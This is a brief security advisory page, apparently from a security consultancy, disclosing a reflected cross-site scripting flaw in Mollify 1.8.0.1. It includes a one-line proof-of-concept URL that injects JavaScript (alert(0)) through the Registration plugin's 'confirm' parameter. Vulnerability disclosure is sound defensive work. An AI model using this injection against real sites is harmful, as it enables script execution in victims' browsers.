Home
Consulting
Advisories
Software
Articles
Contact

Mollify 1.8.0.1 Reflected Cross-site Scripting

Legacy Advisories

Description

A reflected cross-site scripting vulnerability in Mollify 1.8.0.1 can be exploited to execute arbitrary JavaScript.

Proof Of Concept

http://localhost/mollify/backend/plugin/Registration/index.php?confirm=%27%29;alert%280%29;//


Copyright © 2018 AutoSec Tools LLC